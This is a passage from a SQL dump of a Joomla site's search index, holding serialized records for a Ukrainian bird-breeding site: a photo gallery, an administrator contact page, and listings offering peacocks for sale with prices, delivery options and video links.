20:51:49','838cfa4cc12a442fbf365c13fa7d7682',1,1,1,'*','0000-00-00 00:00:00','0000-00-00 00:00:00','2020-08-30 13:15:58','0000-00-00 00:00:00',0,0,2,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:18:{s:2:\"id\";s:3:\"131\";s:5:\"alias\";s:12:\"fotohalereia\";s:7:\"summary\";s:2:\"		\";s:9:\"extension\";s:11:\"com_content\";s:10:\"created_by\";s:3:\"430\";s:8:\"modified\";s:19:\"2020-08-30 17:51:49\";s:11:\"modified_by\";s:3:\"430\";s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":2:{s:6:\"author\";s:0:\"\";s:6:\"robots\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:3:\"lft\";s:3:\"172\";s:9:\"parent_id\";s:3:\"133\";s:5:\"level\";s:1:\"2\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":3:{s:15:\"category_layout\";s:0:\"\";s:5:\"image\";s:0:\"\";s:9:\"image_alt\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:4:\"slug\";s:16:\"131:fotohalereia\";s:6:\"layout\";s:8:\"category\";s:10:\"metaauthor\";N;s:4:\"path\";s:15:\"/index.php/foto\";}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:4:\"link\";i:4;s:7:\"metakey\";i:5;s:8:\"metadesc\";i:6;s:10:\"metaauthor\";i:7;s:6:\"author\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:2:{s:4:\"Type\";a:1:{s:8:\"Category\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:8:\"Category\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=category&id=131\";s:5:\"route\";s:49:\"index.php?option=com_content&view=category&id=131\";s:5:\"title\";s:22:\"Фотогалерея\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"0000-00-00 00:00:00\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-08-30 13:15:58\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:2;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4552,'index.php?option=com_content&view=category&id=64','index.php?option=com_content&view=category&id=64','адміністратор сайту',' Ви можете написати листа адміністратору на malehus@ukr.net ','2020-08-30 13:30:40','0df376a2e12bc9c1a2be82bae2bc6f03',1,1,1,'*','0000-00-00 00:00:00','0000-00-00 00:00:00','2014-09-19 15:22:33','0000-00-00 00:00:00',0,0,2,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:18:{s:2:\"id\";s:2:\"64\";s:5:\"alias\";s:19:\"administrator-sajtu\";s:7:\"summary\";s:150:\"<p>Ви можете написати листа адміністратору на <a href=\"mailto:malehus@ukr.net\">malehus@ukr.net</a></p><p><br></p>\";s:9:\"extension\";s:11:\"com_content\";s:10:\"created_by\";s:3:\"430\";s:8:\"modified\";s:19:\"2020-08-30 10:30:40\";s:11:\"modified_by\";s:3:\"430\";s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":2:{s:6:\"author\";s:0:\"\";s:6:\"robots\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:3:\"lft\";s:3:\"145\";s:9:\"parent_id\";s:1:\"1\";s:5:\"level\";s:1:\"1\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":3:{s:15:\"category_layout\";s:0:\"\";s:5:\"image\";s:0:\"\";s:9:\"image_alt\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:4:\"slug\";s:22:\"64:administrator-sajtu\";s:6:\"layout\";s:8:\"category\";s:10:\"metaauthor\";N;s:4:\"path\";s:33:\"/index.php/64-administrator-sajtu\";}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:4:\"link\";i:4;s:7:\"metakey\";i:5;s:8:\"metadesc\";i:6;s:10:\"metaauthor\";i:7;s:6:\"author\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:2:{s:4:\"Type\";a:1:{s:8:\"Category\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:8:\"Category\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:48:\"index.php?option=com_content&view=category&id=64\";s:5:\"route\";s:48:\"index.php?option=com_content&view=category&id=64\";s:5:\"title\";s:37:\"адміністратор сайту\";s:11:\"description\";s:97:\" Ви можете написати листа адміністратору на malehus@ukr.net \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"0000-00-00 00:00:00\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2014-09-19 15:22:33\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:2;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4569,'index.php?option=com_content&view=article&id=2449','index.php?option=com_content&view=article&id=2449:prodaetsya-para-molodikh-chornikh-pavliniv&catid=128','Пара молодих чорних павлінів',' Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Овруч. За пару 260, телефонуйте, домовимось. Відео за посиланням: http://www.youtube.com/watch?v=4hiex0SmVHI ','2020-08-30 17:31:09','2bbb63924939ce359aa6b8b0d7d31169',1,1,1,'*','2020-08-30 14:06:44','0000-00-00 00:00:00','2020-08-30 14:06:44','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2449\";s:5:\"alias\";s:42:\"prodaetsya-para-molodikh-chornikh-pavliniv\";s:7:\"summary\";s:932:\"<p style=\"text-align: left;\"><span style=\"font-family: Times New Roman,Times; font-size: 14px;\">Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Овруч. За пару 260, телефонуйте, домовимось.</span></p><p><span style=\"font-family: Times New Roman,Times; font-size: 14px;\">Відео за посиланням:&nbsp;</span> &nbsp;&nbsp;<a href=\"http://www.youtube.com/watch?v=4hiex0SmVHI\">http://www.youtube.com/watch?v=4hiex0SmVHI</a></p><p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/gl_0001_960x640.jpg\"><img alt=\"\" class=\"fr-dii fr-fin\" src=\"https://malehus.in.ua/images/stories/gl_0001_960x640.jpg\"></a><br></p><p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/gl_0006_960x640.jpg\"><img alt=\"\" class=\"fr-dii fr-fin\" src=\"https://malehus.in.ua/images/stories/gl_0006_960x640.jpg\"></a><br></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"128\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-08-30 14:31:09\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"9\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:29:\"Павліни (павичі)\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:47:\"2449:prodaetsya-para-molodikh-chornikh-pavliniv\";s:7:\"catslug\";s:19:\"128:pavliny-pavychi\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:81:\"/index.php/holuby/pavliny-pavychi/2449-prodaetsya-para-molodikh-chornikh-pavliniv\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:29:\"Павліни (павичі)\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:29:\"Павліни (павичі)\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2449\";s:5:\"route\";s:102:\"index.php?option=com_content&view=article&id=2449:prodaetsya-para-molodikh-chornikh-pavliniv&catid=128\";s:5:\"title\";s:53:\"Пара молодих чорних павлінів\";s:11:\"description\";s:286:\" Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Овруч. За пару 260, телефонуйте, домовимось. Відео за посиланням: http://www.youtube.com/watch?v=4hiex0SmVHI \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-08-30 14:06:44\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-08-30 14:06:44\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4571,'index.php?option=com_content&view=article&id=2450','index.php?option=com_content&view=article&id=2450:bili-pavlini&catid=128','Білі павліни',' В наявності дві голубки та один самець. Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Овруч. По 150, телефонуйте, домовимось. Відео за посиланнями: https://www.youtube.com/watch?v=cAx8y_06ulk https://www.youtube.com/watch?v=oCgoVVd8ZdY https://www.youtube.com/watch?v=bU8wTAB0tqY ','2020-08-30 17:40:49','3c2a7de8e9605e64faf3cd245d774b27',1,1,1,'*','2020-08-30 14:38:39','0000-00-00 00:00:00','2020-08-30 14:38:39','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2450\";s:5:\"alias\";s:12:\"bili-pavlini\";s:7:\"summary\";s:2467:\"<!--StartFragment--><p style=\"margin: 13px 0px; padding: 0px; color: rgb(41, 43, 39); font-family: Arial, &amp;quot;Arial Unicode MS&amp;quot;, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(255, 255, 255); text-decoration-style: initial; text-decoration-color: initial;\">В наявності дві голубки та один самець. Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Овруч. По 150, телефонуйте, домовимось.</p><p style=\"margin: 13px 0px; padding: 0px; color: rgb(41, 43, 39); font-family: Arial, &amp;quot;Arial Unicode MS&amp;quot;, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(255, 255, 255); text-decoration-style: initial; text-decoration-color: initial;\">Відео за посиланнями:&nbsp;</p><p><a href=\"https://www.youtube.com/watch?v=cAx8y_06ulk\"><!--StartFragment-->https://www.youtube.com/watch?v=cAx8y_06ulk</a><!--EndFragment--></p><p><a href=\"https://www.youtube.com/watch?v=oCgoVVd8ZdY\"><!--StartFragment-->https://www.youtube.com/watch?v=oCgoVVd8ZdY</a><!--EndFragment--></p><p><a href=\"https://www.youtube.com/watch?v=bU8wTAB0tqY\"><!--StartFragment-->https://www.youtube.com/watch?v=bU8wTAB0tqY</a><!--EndFragment--></p><p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/gl_0021_960x640.jpg\"><img src=\"https://malehus.in.ua/images/stories/gl_0021_960x640.jpg\" alt=\"\" class=\"fr-dii fr-fin\"></a><br></p><p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/gl_0012_960x640.jpg\"><img src=\"https://malehus.in.ua/images/stories/gl_0012_960x640.jpg\" alt=\"\" class=\"fr-dii fr-fin\"></a><br></p><p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/gl_0011_960x640.jpg\"><img src=\"https://malehus.in.ua/images/stories/gl_0011_960x640.jpg\" alt=\"\" class=\"fr-dii fr-fin\"></a><br></p><p><br></p><!--EndFragment-->\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"128\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-08-30 14:40:49\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"2\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:29:\"Павліни (павичі)\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:17:\"2450:bili-pavlini\";s:7:\"catslug\";s:19:\"128:pavliny-pavychi\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:51:\"/index.php/holuby/pavliny-pavychi/2450-bili-pavlini\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:29:\"Павліни (павичі)\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:29:\"Павліни (павичі)\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2450\";s:5:\"route\";s:72:\"index.php?option=com_content&view=article&id=2450:bili-pavlini&catid=128\";s:5:\"title\";s:23:\"Білі павліни\";s:11:\"description\";s:440:\" В наявності дві голубки та один самець. Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Овруч. По 150, телефонуйте, домовимось. Відео за посиланнями: https://www.youtube.com/watch?v=cAx8y_06ulk https://www.youtube.com/watch?v=oCgoVVd8ZdY https://www.youtube.com/watch?v=bU8wTAB0tqY \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-08-30 14:38:39\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-08-30 14:38:39\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4572,'index.php?option=com_content&view=article&id=2451','index.php?option=com_content&view=article&id=2451:chornokhvosta-samka-pavlina&catid=128','Чорнохвоста самка павліна',' В наявності самка 2019 року. Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Овруч. По 180, телефонуйте, домовимось. Відео за посиланнями: https://www.youtube.com/watch?v=NSxpoY-04GY ','2020-08-30 17:44:50','b0174cfe641116d5872d879fc94bea0e',1,1,1,'*','2020-08-30 14:44:50','0000-00-00 00:00:00','2020-08-30 14:44:50','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2451\";s:5:\"alias\";s:27:\"chornokhvosta-samka-pavlina\";s:7:\"summary\";s:1758:\"<!--StartFragment--><p style=\"margin: 13px 0px; padding: 0px; color: rgb(41, 43, 39); font-family: Arial, &amp;quot;Arial Unicode MS&amp;quot;, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: 